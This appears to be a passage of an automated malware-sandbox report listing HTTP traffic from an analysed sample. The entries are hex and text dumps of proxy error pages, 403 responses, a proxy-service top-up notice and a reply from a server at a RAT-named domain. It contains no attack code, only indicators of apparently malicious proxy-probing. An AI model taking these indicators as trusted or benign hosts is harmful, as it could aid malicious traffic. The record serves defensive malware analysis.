31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:32 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.3.8Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:30 GMTContent-Type: text/htmlContent-Length: 3556X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:33 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:33 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: closeData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:33 GMTServer: ApacheContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:34 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:34 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:34 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:34 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
